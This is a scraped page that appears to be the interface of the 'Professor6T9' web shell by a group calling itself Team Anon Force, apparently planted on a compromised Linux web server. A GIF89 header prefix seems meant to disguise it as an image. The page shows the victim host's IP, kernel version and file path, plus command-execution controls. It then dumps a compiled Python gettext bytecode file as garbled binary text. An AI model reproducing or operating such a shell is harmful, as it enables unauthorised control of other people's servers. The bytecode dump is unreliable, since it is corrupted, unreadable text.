GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux 98.35.109.208.host.secureserver.net 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
Apache
208.109.35.98
/
opt
/
python38
/
lib
/
python3.8
/
__pycache__
[ HOME ]
Exec
Submit
File Name : gettext.cpython-38.pyc
U ��f�� � @ s� d Z ddlZddlZddlZddlZddddddd d ddd ddddddddddgZej�ejdd�Z e� dejejB �Z dd� Zdd� ZdZd d!� eed"�D �Zd#d$d%d&�ZdGd(d)�Zd*d+� Zd,d-� Zd.d/� ZG d0d� d�ZG d1d� de�ZdHd3d�Zi Zd4gZdddd2efd5d�Zdedfd6d�Zi ai ad7a dId8d �Z!dJd9d �Z"dKd:d�Z#d;d� Z$d<d� Z%d=d � Z&d>d� Z'd?d� Z(d@d� Z)dAd� Z*dBd� Z+dCd� Z,dDd� Z-dEd� Z.dFd� Z/eZ0dS )La� Internationalization and localization support. This module provides internationalization (I18N) and localization (L10N) support for your Python programs by providing an interface to the GNU gettext message catalog library. I18N refers to the operation by which a program is made aware of multiple languages. L10N refers to the adaptation of your program, once internationalized, to the local language and cultural habits. � N�NullTranslations�GNUTranslations�Catalog�find�translation�install� textdomain�bindtextdomain�bind_textdomain_codeset�dgettext� dngettext�gettext�lgettext� ldgettext� ldngettext� lngettext�ngettext�pgettext� dpgettext� npgettext� dnpgettext�share�localea� (?P<WHITESPACES>[ \t]+) | # spaces and horizontal tabs (?P<NUMBER>[0-9]+\b) | # decimal integer (?P<NAME>n\b) | # only n is allowed (?P<PARENTHESIS>[()]) | (?P<OPERATOR>[-*/%+?:]|[><!]=?|==|&&|\|\|) | # !, *, /, %, +, -, <, >, # <=, >=, ==, !=, &&, ||, # ? : # unary and bitwise ops # not allowed (?P<INVALID>\w+|.) # invalid token c c sP t �t| �D ]8}|j}|dkr q|�|�}|dkr>td| ��|V qdV d S )N�WHITESPACES�INVALIDz invalid token in plural form: %s� )�re�finditer�_token_pattern� lastgroup�group� ValueError)�plural�mo�kind�value� r&